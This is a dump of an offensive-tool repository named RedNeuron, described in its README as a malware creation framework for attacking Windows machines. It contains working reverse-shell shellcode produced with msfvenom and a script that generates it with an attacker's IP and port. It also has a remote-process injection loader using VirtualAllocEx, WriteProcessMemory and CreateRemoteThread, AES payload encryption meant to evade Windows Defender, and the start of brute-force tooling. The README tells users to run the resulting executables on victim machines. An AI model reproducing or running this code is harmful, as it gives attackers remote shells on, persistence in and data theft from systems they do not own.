├── .github └── FUNDING.yml ├── README.md ├── RedNeuron ├── code ├── ColorClass.h ├── PEstructs.h ├── RedNeuron ├── WindowInjector │ ├── WindowsInjector.sh │ ├── code │ │ ├── shellcode.c │ │ └── windowname.txt │ ├── src │ │ ├── banner.sh │ │ ├── copyshellcode.py │ │ ├── shellcodegen.sh │ │ ├── windowinjector.cpp │ │ └── windowinjector2.cpp │ └── windowinjector.exe ├── aesencrypt.py ├── aesencrypt2.py ├── banner.sh ├── bruteforce │ ├── mysql │ │ ├── SQL.h │ │ ├── WordlistToVector.h │ │ ├── bruteMySQL │ │ ├── bruteMySQL.cpp │ │ ├── utils │ │ │ ├── ColorClass.h │ │ │ ├── WordlistToVector.h │ │ │ └── colors.h │ │ └── wordlist.txt │ └── ssh │ │ ├── .vscode │ │ └── tasks.json │ │ ├── Banner.h │ │ ├── BruteForce.cpp │ │ ├── Host.cpp │ │ ├── Host.h │ │ ├── Utils │ │ ├── ColorClass.h │ │ └── WordlistToVector.h │ │ ├── bruteSSH │ │ └── wordlist.txt ├── checks.sh ├── create.h ├── helpers.cpp ├── helpers.h ├── mainshell.h ├── menus.h ├── msfvenom.sh ├── persistence │ ├── check.sh │ ├── runkeys.cpp │ └── runkeys2.cpp ├── postexploitation │ ├── MySQL-dataStealer │ │ ├── MySQL_DataStealer.sh │ │ ├── cg.exe │ │ ├── libmysql.dll │ │ ├── server │ │ └── sqlop.exe │ ├── file-extractor │ │ ├── client │ │ ├── file-extractor.sh │ │ ├── fileExtractor.exe │ │ └── server │ ├── keylogger │ │ ├── keylogger.cpp │ │ ├── keylogger.exe │ │ └── keylogger.sh │ └── postExpShell.h ├── proclist │ ├── ProcList.cpp │ ├── procList.exe │ └── proclist.sh ├── revshell.cpp ├── revshell2.cpp ├── runkeys.cpp ├── shell.h ├── shellcode.c ├── temp.raw └── windowname.txt ├── redneuron.cpp └── redneuron.zip /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry 13 | custom: https://medium.com/@s12deff/membership 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RedNeuron 2 | RedNeuron is a Framework Creator of Malware, this framework it's focused in attacking Windows Machines but are created to execute the creator framework in Linux, you can use it in any Linux distribution you only need the necessary requeriments. 3 | 4 | If you want to collaborate with code or ideas you can contact me in s12deff@gmail.com. 5 | 6 | If you want to help the development of this tool with money, you can buy one suscription in Medium: 7 | https://medium.com/@s12deff/membership 8 | 9 | It's developed in Kali Linux machine, and tested in Kali, Athena OS, Ubuntu and Parrot OS. 10 | 11 | Actually in Version 1.6, the uniques 6 malwares options to create is a Undetectable Reverse Shell to bypass Windows Defender, and Persitence file using Run Register, also you have a ProcList tool to list all processes, also exists a FindWindow Tool that tool inject a reverse shell into a remote process via process Window Name, a MySQL Data Stealer using Triggers and C2 Server ,latest tool inside RedNeuron its File Extractor, this tool are developed mainly with 3 languages: 12 | - C++ 13 | - Python 14 | - Bash 15 | 16 | This tool have a shell to use and move inside RedNeuron, in this moment only have three sections 17 | - Main 18 | - Create 19 | - PostExploitation 20 | 21 | Future Malware tools: 22 | - C2 Server 23 | - KeyLogger 24 | - Ransomware 25 | 26 | ![image](https://user-images.githubusercontent.com/79543461/210807455-2dae7b7f-884d-47de-81c3-0f9bde1cbc27.png) 27 | 28 | # Installation 29 | 30 | **Clone this repository:** 31 | 32 | git clone https://github.com/S12cybersecurity/RedNeuron 33 | 34 | **Install requeriments:** 35 | 36 | apt update && apt install python2 && apt install g++-mingw-w64 37 | 38 | **If you don't have Metasploit you need to install.** 39 | 40 | Guide: https://adamtheautomator.com/install-metasploit-on-ubuntu/ 41 | 42 | **Set RedNeuron as executable** 43 | 44 | chmod +x RedNeuron 45 | 46 | **Python2 requeriments** 47 | 48 | wget https://bootstrap.pypa.io/pip/2.7/get-pip.py 49 | 50 | python2 get-pip.py 51 | 52 | pip2 install pycryptodome 53 | 54 | **Compile** 55 | 56 | The code it's compiled, but if you want to compile run this command: 57 | 58 | gcc redneuron.cpp -lstdc++ -Wwrite-strings -o RedNeuron 59 | 60 | # Usage 61 | 62 | Execute ./RedNeuron 63 | 64 | ![image](https://user-images.githubusercontent.com/79543461/210810523-37e7a677-3bfd-45d6-8c0e-a5fc23fd1d6b.png) 65 | 66 | If you want to create malware, you execute create command: 67 | 68 | ![image](https://user-images.githubusercontent.com/79543461/212728043-bdabe8f2-056f-4fcf-ae2d-9cab650b82be.png) 69 | 70 | With list command you can see all available malware: 71 | 72 | ![image](https://user-images.githubusercontent.com/79543461/212728136-0e453634-f5ce-4380-9174-10eb994d4aa8.png) 73 | 74 | Create Undetectable Windows Reverse Shell: 75 | 76 | ![image](https://user-images.githubusercontent.com/79543461/210821342-e18e2053-c7c7-404f-9313-03f2d2a8c32b.png) 77 | 78 | Create Windows Persistence File: 79 | 80 | ![image](https://user-images.githubusercontent.com/79543461/212728269-3ce8ae5e-d3a0-431e-98b0-7cf70ebe4909.png) 81 | 82 | Create ProcList EXE: 83 | 84 | ![image](https://user-images.githubusercontent.com/79543461/218328334-b994a2f6-1283-4230-9134-1f47cb4087f8.png) 85 | 86 | Now execute in Victim machine! 87 | 88 | WindowInjector 89 | 90 | Run WindowInjector command: 91 | 92 | ![image](https://user-images.githubusercontent.com/79543461/226188793-a9331bb9-2009-48db-819f-7201132ef2a2.png) 93 | 94 | ![image](https://user-images.githubusercontent.com/79543461/226188830-cd5ee493-0e8a-49b1-96c4-22c79c1d3820.png) 95 | 96 | And Now Execute in Victim machine: 97 | 98 | ![image](https://user-images.githubusercontent.com/79543461/226189011-ae56b779-04d4-47e6-9376-d4db58eef477.png) 99 | 100 | ![image](https://user-images.githubusercontent.com/79543461/226189018-dbd3a2b2-4d34-4a1f-b70f-26c7242828c2.png) 101 | 102 | And get the reverse shell: 103 | 104 | ![image](https://user-images.githubusercontent.com/79543461/226189038-42d267da-c474-4014-8cce-aef371dfc855.png) 105 | 106 | File Extractor 107 | 108 | First enter to postexplotation shell: 109 | 110 | ![image](https://user-images.githubusercontent.com/79543461/228027276-db18e423-7dac-4095-a97f-dea15d308e95.png) 111 | 112 | Then execute file-extractor command: 113 | 114 | ![image](https://user-images.githubusercontent.com/79543461/228027780-2c03032c-6f8d-4e6e-9fe7-5cd6c35f3cca.png) 115 | 116 | Now you have in your directory the exe to execute in windows machine to transfer a file to RedNeuron. 117 | 118 | You only need to provide the information. And its listening: 119 | 120 | ![image](https://user-images.githubusercontent.com/79543461/228028022-aedea961-05f0-4039-a065-51cc9ec32196.png) 121 | 122 | And in Windows Machine execute it: 123 | 124 | ![image](https://user-images.githubusercontent.com/79543461/228028227-9b86f83c-8ec6-4094-b0c8-366fe9fbec2c.png) 125 | 126 | ![image](https://user-images.githubusercontent.com/79543461/228034894-6f593e68-95b6-46eb-9253-3500de17a459.png) 127 | 128 | And here you have your transfered file 129 | 130 | MySQL Data Stealer: 131 | 132 | First of all, this tool its post-exploitation, to enter it we need to execute postexploitation command: 133 | 134 | ![image](https://user-images.githubusercontent.com/79543461/229364424-e508f76c-55c7-4a36-848b-17200abe6e2d.png) 135 | 136 | And now execute mysql-stealer: 137 | 138 | ![image](https://user-images.githubusercontent.com/79543461/229364439-faf23136-1814-422c-946c-3746a89cd96a.png) 139 | 140 | To use it you can check this Medium Post about it! 141 | 142 | https://medium.com/@s12deff/mysql-data-stealer-hacking-mysql-26b960bb7d10 143 | -------------------------------------------------------------------------------- /RedNeuron: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/RedNeuron -------------------------------------------------------------------------------- /code/ColorClass.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | using namespace std; 5 | 6 | void red(string text) 7 | { 8 | cout << "\033[31m" << text << "\033[0m"; 9 | } 10 | void blue(string text) 11 | { 12 | cout << "\033[34m" << text << "\033[0m"; 13 | } 14 | void yellow(string text) 15 | { 16 | cout << "\033[33m" << text << "\033[0m"; 17 | } 18 | void black(string text) 19 | { 20 | cout << "\033[30m" << text << "\033[0m"; 21 | } 22 | void green(string text) 23 | { 24 | cout << "\033[32m" << text << "\033[0m"; 25 | } 26 | void cyan(string text) 27 | { 28 | cout << "\033[36m" << text << "\033[0m"; 29 | } 30 | -------------------------------------------------------------------------------- /code/PEstructs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | //https://processhacker.sourceforge.io/doc/ntpsapi_8h_source.html#l00063 6 | struct PEB_LDR_DATA 7 | { 8 | ULONG Length; 9 | BOOLEAN Initialized; 10 | HANDLE SsHandle; 11 | LIST_ENTRY InLoadOrderModuleList; 12 | LIST_ENTRY InMemoryOrderModuleList; 13 | LIST_ENTRY InInitializationOrderModuleList; 14 | PVOID EntryInProgress; 15 | BOOLEAN ShutdownInProgress; 16 | HANDLE ShutdownThreadId; 17 | }; 18 | //https://processhacker.sourceforge.io/doc/ntpebteb_8h_source.html#l00008 19 | struct PEB 20 | { 21 | BOOLEAN InheritedAddressSpace; 22 | BOOLEAN ReadImageFileExecOptions; 23 | BOOLEAN BeingDebugged; 24 | union 25 | { 26 | BOOLEAN BitField; 27 | struct 28 | { 29 | BOOLEAN ImageUsesLargePages : 1; 30 | BOOLEAN IsProtectedProcess : 1; 31 | BOOLEAN IsImageDynamicallyRelocated : 1; 32 | BOOLEAN SkipPatchingUser32Forwarders : 1; 33 | BOOLEAN IsPackagedProcess : 1; 34 | BOOLEAN IsAppContainer : 1; 35 | BOOLEAN IsProtectedProcessLight : 1; 36 | BOOLEAN SpareBits : 1; 37 | }; 38 | }; 39 | HANDLE Mutant; 40 | PVOID ImageBaseAddress; 41 | PEB_LDR_DATA* Ldr; 42 | //... 43 | }; 44 | 45 | struct UNICODE_STRING 46 | { 47 | USHORT Length; 48 | USHORT MaximumLength; 49 | PWCH Buffer; 50 | }; 51 | 52 | //https://processhacker.sourceforge.io/doc/ntldr_8h_source.html#l00102 53 | struct LDR_DATA_TABLE_ENTRY 54 | { 55 | LIST_ENTRY InLoadOrderLinks; 56 | LIST_ENTRY InMemoryOrderLinks; 57 | union 58 | { 59 | LIST_ENTRY InInitializationOrderLinks; 60 | LIST_ENTRY InProgressLinks; 61 | }; 62 | PVOID DllBase; 63 | PVOID EntryPoint; 64 | ULONG SizeOfImage; 65 | UNICODE_STRING FullDllName; 66 | UNICODE_STRING BaseDllName; 67 | //... 68 | }; -------------------------------------------------------------------------------- /code/RedNeuron: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/RedNeuron -------------------------------------------------------------------------------- /code/WindowInjector/WindowsInjector.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | 3 | bash code/WindowInjector/src/banner.sh 4 | -------------------------------------------------------------------------------- /code/WindowInjector/code/shellcode.c: -------------------------------------------------------------------------------- 1 | unsigned char buf[] = 2 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 3 | "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" 4 | "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" 5 | "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" 6 | "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" 7 | "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" 8 | "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" 9 | "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" 10 | "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" 12 | "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" 13 | "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 14 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 15 | "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" 16 | "\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" 17 | "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00" 18 | "\x00\x49\x89\xe5\x49\xbc\x02\x00\x04\xbc\xc0\xa8\x00\x87" 19 | "\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" 20 | "\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29" 21 | "\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48" 22 | "\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea" 23 | "\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" 24 | "\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81" 25 | "\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00" 26 | "\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0" 27 | "\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" 28 | "\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41" 29 | "\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d" 30 | "\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48" 31 | "\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" 32 | "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5" 33 | "\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 34 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; 35 | -------------------------------------------------------------------------------- /code/WindowInjector/code/windowname.txt: -------------------------------------------------------------------------------- 1 | Untitled - Notepad 2 | -------------------------------------------------------------------------------- /code/WindowInjector/src/banner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | 10 | compiler_exists() { 11 | if which x86_64-w64-mingw32-g++ >/dev/null; then 12 | echo true 13 | else 14 | echo false 15 | fi 16 | } 17 | 18 | payload_creator_exists() { 19 | if which msfvenom >/dev/null; then 20 | echo true 21 | else 22 | echo false 23 | fi 24 | } 25 | 26 | echo -e "${YELLOW}[+] Checking Dependencies...${ENDCOLOR}\n" 27 | 28 | if [ "$(compiler_exists)" == true ] && [ "$(payload_creator_exists)" == true ]; then 29 | echo -e "${GREEN}[+] Dependencies Found ${ENDCOLOR}" 30 | sleep 3s 31 | clear 32 | else 33 | echo -e "${RED}[-] Some Dependencies not Found${ENDCOLOR}" 34 | if [ "$(compiler_exists)" == false ]; then 35 | echo -e "You can install the compiler with: sudo apt-get install g++-mingw-w64" 36 | fi 37 | if [ "$(payload_creator_exists)" == false ]; then 38 | echo -e "You can install the payload creator following this guide: https://adamtheautomator.com/install-metasploit-on-ubuntu/" 39 | fi 40 | exit 41 | fi 42 | 43 | 44 | echo -e "${RED} 45 | _ _ _ _ _ _____ _ _ 46 | | | | |_|___ _| |___ _ _ _ | |___ |_|___ ___| |_ ___ ___ 47 | | | | | | | . | . | | | | |- -| | | | -_| _| _| . | _| 48 | |_____|_|_|_|___|___|_____| |_____|_|_|_| |___|___|_| |___|_| 49 | |___| ${ENDCOLOR}\n" 50 | 51 | echo -e "${RED}\t\t Created by S12 <-> Salsa${ENDCOLOR}" 52 | 53 | bash code/WindowInjector/src/shellcodegen.sh 54 | -------------------------------------------------------------------------------- /code/WindowInjector/src/copyshellcode.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | with open('code/WindowInjector/src/windowinjector2.cpp', 'r') as f: 4 | content = f.read() 5 | 6 | with open('code/WindowInjector/code/shellcode.c', 'r') as f: 7 | replacement = f.read() 8 | 9 | content = content.replace('PAYLOAD_HERE', replacement) 10 | 11 | with open('code/WindowInjector/src/windowinjector2.cpp', 'w') as f: 12 | f.write(content) 13 | 14 | with open('code/WindowInjector/src/windowinjector2.cpp', 'r') as f: 15 | content = f.read() 16 | 17 | with open('code/WindowInjector/code/windowname.txt', 'r') as f: 18 | replacement = f.read().rstrip() 19 | 20 | content = content.replace('WINDOW_HERE', replacement) 21 | 22 | with open('code/WindowInjector/src/windowinjector2.cpp', 'w') as f: 23 | f.write(content) 24 | 25 | -------------------------------------------------------------------------------- /code/WindowInjector/src/shellcodegen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | echo -e "${YELLOW}\n[+] Create Windows Reverse Shell \nProvide the following information about YOUR attacker machine${ENDCOLOR}\n" 10 | printf "IP = " 11 | read -r ip 12 | printf "PORT = " 13 | read -r port 14 | printf "Window Name to Inject Shell = " 15 | read -r windowname 16 | 17 | 18 | echo $windowname > code/windowname.txt 19 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ip LPORT=$port -f c -o code/WindowInjector/code/shellcode.c >/dev/null 20 | cp code/WindowInjector/src/windowinjector.cpp code/WindowInjector/src/windowinjector2.cpp 2>/dev/null 21 | python3 code/WindowInjector/src/copyshellcode.py 22 | 23 | x86_64-w64-mingw32-g++ code/WindowInjector/src/windowinjector2.cpp -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -o windowinjector.exe -fpermissive 2 2 | #include 3 | #include 4 | 5 | PAYLOAD_HERE 6 | 7 | int main() { 8 | 9 | HANDLE ph; 10 | HANDLE rt; 11 | DWORD pid; 12 | 13 | // find a window for mspaint.exe 14 | HWND hw = FindWindow(NULL, (LPCSTR) "WINDOW_HERE"); 15 | if (hw == NULL) { 16 | printf("failed to find window :(\n"); 17 | return -2; 18 | } 19 | GetWindowThreadProcessId(hw, &pid); 20 | ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 21 | 22 | LPVOID rb = VirtualAllocEx(ph, NULL, sizeof(buf), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 23 | WriteProcessMemory(ph, rb, buf, sizeof(buf), NULL); 24 | 25 | rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL); 26 | CloseHandle(ph); 27 | 28 | return 0; 29 | } -------------------------------------------------------------------------------- /code/WindowInjector/src/windowinjector2.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | unsigned char buf[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 7 | "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" 8 | "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" 9 | "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" 10 | "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" 11 | "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" 12 | "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" 13 | "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" 14 | "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" 15 | "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" 16 | "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" 17 | "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 18 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 19 | "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" 20 | "\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" 21 | "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00" 22 | "\x00\x49\x89\xe5\x49\xbc\x02\x00\x04\xbc\xc0\xa8\x00\x87" 23 | "\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" 24 | "\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29" 25 | "\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48" 26 | "\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea" 27 | "\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" 28 | "\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81" 29 | "\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00" 30 | "\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0" 31 | "\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" 32 | "\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41" 33 | "\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d" 34 | "\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48" 35 | "\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" 36 | "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5" 37 | "\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 38 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; 39 | 40 | 41 | int main() { 42 | 43 | HANDLE ph; 44 | HANDLE rt; 45 | DWORD pid; 46 | 47 | // find a window for mspaint.exe 48 | HWND hw = FindWindow(NULL, (LPCSTR) "Untitled - Notepad"); 49 | if (hw == NULL) { 50 | printf("failed to find window :(\n"); 51 | return -2; 52 | } 53 | GetWindowThreadProcessId(hw, &pid); 54 | ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 55 | 56 | LPVOID rb = VirtualAllocEx(ph, NULL, sizeof(buf), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 57 | WriteProcessMemory(ph, rb, buf, sizeof(buf), NULL); 58 | 59 | rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL); 60 | CloseHandle(ph); 61 | 62 | return 0; 63 | } -------------------------------------------------------------------------------- /code/WindowInjector/windowinjector.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/WindowInjector/windowinjector.exe -------------------------------------------------------------------------------- /code/aesencrypt.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from Crypto.Cipher import AES 3 | from os import urandom 4 | import hashlib 5 | 6 | KEY = urandom(16) 7 | 8 | def pad(s): 9 | return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) 10 | 11 | def aesenc(plaintext, key): 12 | 13 | k = hashlib.sha256(key).digest() 14 | iv = 16 * '\x00' 15 | plaintext = pad(plaintext) 16 | cipher = AES.new(k, AES.MODE_CBC, iv) 17 | 18 | return cipher.encrypt(bytes(plaintext)) 19 | 20 | 21 | 22 | try: 23 | plaintext = open(sys.argv[1], "rb").read() 24 | except: 25 | print(("File argument needed! %s " % sys.argv[0])) 26 | sys.exit() 27 | 28 | 29 | 30 | ciphertext = aesenc(plaintext, KEY) 31 | key = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };' 32 | payload = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };' 33 | 34 | 35 | 36 | f = open("code/revshell2.cpp", "r") 37 | 38 | with open('code/revshell2.cpp', 'r') as file : 39 | filedata = file.read() 40 | 41 | filedata = filedata.replace('payloadaes', payload) 42 | 43 | with open('code/revshell2.cpp', 'w') as file: 44 | file.write(filedata) 45 | 46 | f = open("code/revshell2.cpp", "r") 47 | 48 | filedata = filedata.replace('KEYAES', key) 49 | 50 | with open('code/revshell2.cpp', 'w') as file: 51 | file.write(filedata) 52 | -------------------------------------------------------------------------------- /code/aesencrypt2.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from Crypto.Cipher import AES 3 | from os import urandom 4 | import hashlib 5 | import pandas as pd 6 | data = pd.read_csv(sys.argv[1], encoding= 'unicode_escape') 7 | 8 | KEY = urandom(16) 9 | 10 | def pad(s): 11 | return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) 12 | 13 | def aesenc(plaintext, key): 14 | 15 | k = hashlib.sha256(key).digest() 16 | iv = 16 * '\x00' 17 | plaintext = pad(plaintext) 18 | cipher = AES.new(k, AES.MODE_CBC, iv) 19 | 20 | return cipher.encrypt(bytes(plaintext)) 21 | 22 | 23 | plaintext = open(sys.argv[1], "r").read() 24 | 25 | ciphertext = aesenc(plaintext, KEY) 26 | key = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };' 27 | payload = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };' 28 | 29 | 30 | 31 | f = open("revshell2.cpp", "r") 32 | 33 | with open('revshell2.cpp', 'r') as file : 34 | filedata = file.read() 35 | 36 | filedata = filedata.replace('payloadaes', payload) 37 | 38 | with open('revshell2.cpp', 'w') as file: 39 | file.write(filedata) 40 | 41 | f = open("revshell2.cpp", "r") 42 | 43 | filedata = filedata.replace('KEYAES', key) 44 | 45 | with open('revshell2.cpp', 'w') as file: 46 | file.write(filedata) 47 | -------------------------------------------------------------------------------- /code/banner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | RED="\e[31m" 5 | GREEN="\e[32m" 6 | YELLOW="\e[33m" 7 | BLUE="\e[34m" 8 | ENDCOLOR="\e[0m" 9 | 10 | 11 | echo -e "${RED} 12 | _____ _ ___ _ 13 | | __ |___ _| | | | |___ _ _ ___ ___ ___ 14 | | -| -_| . | | | | | -_| | | _| . | | 15 | |__|__|___|___| |_|___|___|___|_| |___|_|_| 16 | ${ENDCOLOR}" -------------------------------------------------------------------------------- /code/bruteforce/mysql/SQL.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | //connect to mysql database 6 | class SQL{ 7 | private: 8 | std::string server; 9 | std::string user; 10 | std::string password; 11 | std::string database; 12 | MYSQL *conn; 13 | 14 | public: 15 | SQL(std::string server, std::string user, std::string password, std::string database){ 16 | this->server = server; 17 | this->user = user; 18 | this->password = password; 19 | this->database = database; 20 | } 21 | 22 | // getters and setters 23 | std::string getServer(){ 24 | return server; 25 | } 26 | void setServer(std::string server){ 27 | this->server = server; 28 | } 29 | std::string getUser(){ 30 | return user; 31 | } 32 | void setUser(std::string user){ 33 | this->user = user; 34 | } 35 | std::string getPassword(){ 36 | return password; 37 | } 38 | void setPassword(std::string password){ 39 | this->password = password; 40 | } 41 | std::string getDatabase(){ 42 | return database; 43 | } 44 | void setDatabase(std::string database){ 45 | this->database = database; 46 | } 47 | 48 | bool connect(){ 49 | //CONNECTION TO MYSQL DATABASE 50 | MYSQL_RES *res; 51 | MYSQL_ROW row; 52 | conn = mysql_init(nullptr); 53 | if(!mysql_real_connect(conn, server.c_str(), user.c_str(), password.c_str(), database.c_str(), 0, nullptr, 0)){ 54 | return false; 55 | } 56 | else{ 57 | return true; 58 | } 59 | } 60 | }; 61 | -------------------------------------------------------------------------------- /code/bruteforce/mysql/WordlistToVector.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | vector readPasswordsFromFile(string fileName) { 8 | vector passwords; 9 | ifstream file(fileName); 10 | if (file.is_open()) { 11 | string line; 12 | while (getline(file, 